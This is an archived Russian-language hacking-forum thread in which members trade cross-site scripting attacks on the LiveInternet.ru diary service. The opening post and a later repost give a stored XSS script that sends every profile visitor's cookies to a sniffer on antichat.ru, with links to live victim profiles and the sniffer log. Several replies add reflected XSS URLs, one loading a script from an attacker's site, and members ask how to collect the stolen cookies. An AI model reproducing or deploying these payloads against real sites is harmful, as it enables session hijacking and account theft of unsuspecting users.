Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   XSS в дневнике LiveInternet.ru (https://forum.antichat.xyz/showthread.php?t=29020)

InferNo23 13.12.2006 12:10

XSS в дневнике LiveInternet.ru
 
Вот нашол активную xss:
когда регимся, вводим в поле "О новом дневнике - в двух словах"
Код:

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
.
потом все кто помотрит ваш профиль отдаст куки...
Примеры:
http://www.liveinternet.ru/users/hello2all/profile/ - тут отдадите куки
http://www.liveinternet.ru/users/nokia1/profile/ - алерт.

-FARAON2005RAMSES- 13.12.2006 19:30

О! санкс! всё пашет!

DimOnOID 13.12.2006 19:34

да..+ тебе )))
хотя уже пол года назад знал.....там ваще админы тупят...

slider 14.12.2006 19:23

http://www.liveinternet.ru/journal_register.php
Поле:*Подтвердить пароль:
не фильтруется!

†Romi4† 14.12.2006 20:06

)) прикольно,лови +

Petr 15.12.2006 02:54

Туплю, не нашел этот пункт :(
Именно где он? Я по новой не регился, я именно хотел бы узнать где он в настройках, + у других в пофиле такого тоже не увидел, Черт не дружу я с таких типов сайтами :(

-FARAON2005RAMSES- 22.12.2006 16:50

именно поэтому ты и не нашёл этот пунктик.
Надо региться заного, тогда найдёшь.

Zadoxlik 22.12.2006 19:20

Пишите Xss вирус =) Мой для ливжурнала помог пользователям получить красивые доменчики третего уровня для своих ЖЖ =)

*D1VER 22.12.2006 20:37

http://market.liveinternet.ru/index.php?id=10091&page=1&vendor=0&sort=2&sortorde r=1&pricelo=10%22%3E%3Cscript%3Ealert()%3C/script%3E0

Пассивная ХSS почти там же!

ReanimatoR 28.12.2006 12:52

PASSIVE XSS при реге счетчиков
http://www.liveinternet.ru/add/add/?rules=agreed&www=&type=site&random=1113854391&url =http%3A%2F%2Flalala.2u2r%2F&aliases=&name="><scri pt src=http://ТВОЙСАЙТ.ru/js.js></script>&email=123%40123.123&password=mikmik&check= mikmik&keywords=&private=&subscribe=on&group=ru&gr oup=ru%2Fauto&ok=+%E4%E0%EB%FC%F8%E5+%3E%3E+

Noman 28.12.2006 19:55

Не совсем понял за что "-", но больше вопросов подобного плана задавать не буду. Единственно хотелось бы узнать, что я нарушил.

во-первых посмотри название темы, то что ты написал не относится сюда.Есть вопрос, ищи, если такая тема есть, прочти, если нету, создай в соответствующем разделе и спроси.Разе непонятно почему "-"?Тоже самое относится и другому товарищу.Еще вопросы?С вами был m0nzt3r :)

Petr 13.01.2007 22:22

если не ошибаюсь пасивный xxs это тот каторый уже прикрыли, так зачем выкладывать его
если не прав объясните что значит пасивный.

пассивная, это когда жертва должна зайти по ссылке, которую ты дашь, чтоб хсс подействовала.Понятно?Мало флейми, устал посты стирать твои.. (m0nzt3r)

re-arranged 27.02.2007 22:03

ребят, а дырку, по ходу, уже прикрыли. мне почему-то кажется, что тут нетрудно будет другую найти, тут просто <script> фильтруется. *вышесказанное было написано без моска, ибо я в этом деле не очень разбираюсь =)*.
может кто-нибудь башковитый и рукастый сможет сообразить в чем тут дело? помогите, пожалуйста.

+toxa+ 27.02.2007 23:08

Цитата:

Сообщение от *D1VER
http://market.liveinternet.ru/index.php?id=10091&page=1&vendor=0&sort=2&sortorde r=1&pricelo=10%22%3E%3Cscript%3Ealert()%3C/script%3E0

Пассивная ХSS почти там же!

Это другой серв....

freddi 27.02.2007 23:28

2 re-arranged

http://www.liveinternet.ru/member2.php?action=addlist&userlist=buddy&userid=7 29772&userownid=undefined"><script>alert("xss")</script>

пассивная

DeadFire 01.03.2007 00:39

Цитата:

Сообщение от InferNo23
Вот нашол активную xss:
когда регимся, вводим в поле "О новом дневнике - в двух словах"
Код:

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
.
потом все кто помотрит ваш профиль отдаст куки...
Примеры:
http://www.liveinternet.ru/users/hello2all/profile/ - тут отдадите куки
http://www.liveinternet.ru/users/nokia1/profile/ - алерт.


А что дальше делать?

Куки отправляются на снифф общий? если да, то я не могу найти его лог =/

Зы: или это уже вообще не катит?


Цитата:

Сообщение от re-arranged
ребят, а дырку, по ходу, уже прикрыли. мне почему-то кажется, что тут нетрудно будет другую найти, тут просто <script> фильтруется. *вышесказанное было написано без моска, ибо я в этом деле не очень разбираюсь =)*.
может кто-нибудь башковитый и рукастый сможет сообразить в чем тут дело? помогите, пожалуйста.

+1 =)

InferNo23 01.03.2007 06:18

Не прикрыли ничего, http://www.liveinternet.ru/users/nokia1/profile/ алерт есть..
2DeadFire лог теперь на old.antichat.ru
Код:

<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Log: http://old.antichat.ru/sniff/log.php

DeadFire 03.03.2007 15:44

Объясните плз для тупых что нужно сделать по шагам.

Зы: там скрипты отсеиваются

Зыы: я создал юзера (Vasssssia) в поле краткая инфа запихал скрипт, ну собсно и в основную тоже, на сниф вообще ниче не приходит..
приходит, когда просто в дневник пихаешь "картинку", только толку от этого как от быка молока...

Зыыы: за лог спасибо

re-arranged 08.03.2007 23:02

2InferNo23 тысяча чертей, отсеиваются <script> </script>.

LeopardSS 25.07.2007 23:59

я не любитель создавать темы изза небольших вопросов, поэтому спрошу тут. В куках лиру хранится чистый мд5 или соль?

Piflit 26.07.2007 00:05

по теме: уязвимость еще существует?

LeopardSS 26.07.2007 01:07

короче так, для теста зарегал акк. Зашел под ним, посмотрел в куках bbpassword имеет значение 1008cac831727c728c87294fe37fd18c что не соответствует мд5хэшу введеного пароля 233223 ; значит другой алгоритм шифрования?

n0ne 26.07.2007 01:31

LeopardSS, врятли, скорее всего это временный "пароль", присвоенный сессии, до её истечения, т.е. пока ты не нажмешь "выйти".

BoxANG 08.08.2007 14:37

Там соль добавляется(((

BoxANG 11.08.2007 14:45

Пассивный...
http://www.liveinternet.ru/showjournal.php?action=draft&journalid="><script>a lert(123)</script>

smc 24.03.2010 17:55

никто не подскажет где xss искать на ли.ру? старые дыры админы залатали, а новых я найти не сумел -не на столько про...
если не жалко поделиться, то пишите в личку (обещаю использовать разумно и не сливыть в паблик ни на ачате ни в других местах).
заранее благодарю

f1ng3r 24.03.2010 18:05

Цитата:

Сообщение от smc
никто не подскажет где xss искать на ли.ру? старые дыры админы залатали, а новых я найти не сумел -не на столько про...
если не жалко поделиться, то пишите в личку (обещаю использовать разумно и не сливыть в паблик ни на ачате ни в других местах).
заранее благодарю

археолог :confused:

smc 24.03.2010 18:20

сам знаю - старую тему поднял. но вместо того чтобы шутить посоветовал бы что-нибудь

xor[jmp] 30.03.2010 21:35

Цитата:

Сообщение от smc
никто не подскажет где xss искать на ли.ру? старые дыры админы залатали, а новых я найти не сумел -не на столько про...
если не жалко поделиться, то пишите в личку (обещаю использовать разумно и не сливыть в паблик ни на ачате ни в других местах).
заранее благодарю

В полях и запросах ^_^


Время: 10:11